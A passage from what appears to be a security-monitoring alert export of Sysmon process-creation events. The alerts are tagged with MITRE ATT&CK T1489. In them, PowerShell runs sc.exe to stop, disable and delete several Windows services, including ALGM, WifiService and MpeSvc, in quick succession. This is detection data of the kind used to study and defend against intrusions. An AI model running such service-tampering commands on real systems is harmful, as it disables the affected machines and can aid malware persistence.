Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.839",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.582 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00102c4f2100} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.583986800Z"",""eventRecordID"":""2728"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.582\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00102c4f2100}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.582"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00102c4f2100}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.760",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:50:29.544 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00103b4c2100} +ProcessId: 2872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.546997700Z"",""eventRecordID"":""2725"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.544\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00103b4c2100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.544"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00103b4c2100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:59.733",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.529 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010e84a2100} +ProcessId: 4752 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ALGM Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config ALGM Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.532792600Z"",""eventRecordID"":""2724"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.529\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010e84a2100}\r\nProcessId: 4752\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: 
Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config ALGM Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.529"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010e84a2100}"",""processId"":""4752"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config ALGM Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.505 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010cc482100} +ProcessId: 4976 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.507517400Z"",""eventRecordID"":""2722"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.505\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010cc482100}\r\nProcessId: 4976\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.505"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010cc482100}"",""processId"":""4976"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.641",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.457 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010aa452100} +ProcessId: 4716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.461883300Z"",""eventRecordID"":""2719"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.457\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010aa452100}\r\nProcessId: 4716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:29.457"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010aa452100}"",""processId"":""4716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.606",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.429 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00104a432100} +ProcessId: 2112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.432717800Z"",""eventRecordID"":""2717"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.429\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00104a432100}\r\nProcessId: 2112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.429"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00104a432100}"",""processId"":""2112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.588",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.415 +ProcessGuid: 